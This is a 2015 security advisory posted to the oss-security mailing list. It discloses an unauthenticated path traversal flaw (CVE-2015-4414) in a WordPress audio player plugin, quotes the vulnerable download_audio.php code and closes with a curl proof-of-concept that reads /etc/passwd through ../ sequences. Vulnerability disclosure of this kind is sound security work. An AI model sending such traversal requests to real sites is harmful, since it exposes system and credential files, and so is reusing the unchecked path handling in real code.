|
Message-id: <B8A5631A-C79C-414C-9067-CBF344C92B07@me.com> Date: Wed, 10 Jun 2015 16:59:05 -0400 From: "Larry W. Cashdollar" <larry0@...com> To: Open Source Security <oss-security@...ts.openwall.com> Subject: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0 Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0 Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-06 Advisory: http://www.vapid.dhs.org/advisory.php?v=124 Download Site: https://wordpress.org/plugins/se-html5-album-audio-player/ Vendor: https://profiles.wordpress.org/sedevelops/ Vendor Notified: 2015-06-06 Vendor Contact: https://profiles.wordpress.org/sedevelops/ Description: An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post. Vulnerability: The se-html5-album-audio-player v1.1.0 plugin for wordpress has a remote file download vulnerability. The download_audio.php file does not correctly check the file path, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../. This vulnerability doesn’t require authentication to the Wordpress site. File ./se-html5-album-audio-player/download_audio.php: 3 $file_name = $_SERVER['DOCUMENT_ROOT'] . $_GET['file']; 4 $is_in_uploads_dir = strpos($file_name, '/wp-content/uploads/'); 5 // make sure it's a file before doing anything! 6 if( is_file($file_name) && $is_in_uploads_dir !== false ) { 7 8 // required for IE 9 if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off'); } 10 11 // get the file mime type using the file extension 12 switch(strtolower(substr(strrchr($file_name, '.'), 1))) { 13 case 'pdf': $mime = 'application/pdf'; break; 14 case 'zip': $mime = 'application/zip'; break; 15 case 'jpeg': 16 case 'jpg': $mime = 'image/jpg'; break; 17 default: $mime = 'application/force-download'; 18 } 19 header('Pragma: public'); // required 20 header('Expires: 0'); // no cache 21 header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); 22 header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT'); 23 header('Cache-Control: private',false); 24 header('Content-Type: '.$mime); 25 header('Content-Disposition: attachment; filename="'.basename($file_name).'"'); 26 header('Content-Transfer-Encoding: binary'); 27 header('Content-Length: '.filesize($file_name)); // provide file size 28 header('Connection: close'); 29 readfile($file_name); // push it out 30 exit(); The above code does not verify if a user is logged in, and do proper sanity checking if the file is outside of the uploads directory. CVEID: 2015-4414 OSVDB: Exploit Code: • $ curl http://www.vapidlabs.com/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.